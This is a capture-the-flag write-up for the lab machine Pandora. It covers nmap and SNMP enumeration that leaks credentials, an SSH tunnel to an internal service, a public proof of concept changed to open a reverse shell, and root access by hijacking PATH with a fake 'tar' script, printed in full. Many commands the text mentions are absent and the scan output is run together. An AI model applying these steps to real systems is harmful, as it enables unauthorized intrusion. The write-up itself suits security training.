# Nmap 7.94SVN scan initiated Tue Aug 27 19:27:11 2024 as: Nmapscanreportfor10.10.11.136Hostisup (0.063s latency).Notshown:998closedtcpports (reset)PORTSTATESERVICE22/tcpopenssh80/tcpopenhttp# Nmap done at Tue Aug 27 19:27:12 2024 -- 1 IP address (1 host up) scanned in 0.84 seconds
We can see port 22 and port 80 open.
I went through the web app and couldn't find much useful. I then tried to do some vhost and sub-directory brute-forcing, but nothing :(:
I then scanned most common 100 UDP ports.
161, SNMP open. Let's enumerate it and see what we get. First, let's check what community strings are available to us:
The public one is up! Let's see !
I found snmpwalk going through all OIDs being messy and taking some time, so I tailored my command to check OIDs individually and I found 1.3.6.1.2.1.25.4 to have a treasure:
FOOTHOLDING💀:
I then ran these credentials on ssh:
Let's check SUDO:
We are not allowed to :( Hmm, trying to check for perm files:
I see now that there is lateral movement involved in this machine prior to getting root. I then started to enumerate the machine and found something interesting in www:
Hmm so this pandora folder is owned by matt. Let's check for internal ports ss -tlpn to see what's going on here:
LATERAL MOVEMENT💀:
So, in order to access this resource, let's set up the ssh tunel:
Navitage to 127.0.0.1:80 in browser:
So I googled for this version's available PoCs and found this I tailored the script to my needs, instead of the "test" I made it run a reverse shell directly.
In the meantime I did setup a listener:
AND BOOOM! We got it :) Upgrade the shell now:
Now remember from our initial enum that there is the backup_pandora interesting file, let's check it now that we got matt. By running cat on it, we can see:
PRIV ESC☠️:
So it is not using an absolute path! Let's try and get root via this. So I did:
For some reason I kept getting matt, so I started searching for something else. First I did stabilize my shell.
Setting up a web server so I can transfer it on my host.
Trying to ssh with the key:
Creating the authorized_keys so that we can do it:
Now again:
Great, we got a stable shell. I did try to enumerate everything again, but nothing. Really the intended path to be this one with the pandora_backup, so I try it again. So:
Running the binary again:
Hmm, this time we have root. Literally this machine made me xplode cuz I was not understanding why this pandora_backup is not giving me root. I will research this.
Anyways, I stabilized the shell for root too to check the machine in-depth and see what happened, cheers!
# Nmap 7.94SVN scan initiated Tue Aug 27 19:28:08 2024 as:
Nmap scan report for 10.10.11.136
Host is up (0.081s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT STATE SERVICE
161/udp open snmp
# Nmap done at Tue Aug 27 19:29:52 2024 -- 1 IP address (1 host up) scanned in 103.35 seconds
export PATH=/home/matt:$PATH
echo "/bin/sh" > tar
chmod +x tar
cd /home/matt
mkdir .ssh
cd .ssh
ssh-keygen -t rsa -b 4096
Generating public/private rsa key pair.
Enter file in which to save the key (/home/matt/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/matt/.ssh/id_rsa
Your public key has been saved in /home/matt/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:Il1dP7Qfs4s2ALlsrhRFvEo1pCODXMrZnOytNa5LqjY matt@pandora
The key's randomart image is:
+---[RSA 4096]----+
| . oo . . |
| o O . o=.. o . |
| * B oo++ +o |
| ..+o+.o o+|
| ..+=S+ . ..|
| .+o= . . .|
| o o . + . |
| E o o . . . |
|..o. o.. |
+----[SHA256]-----+
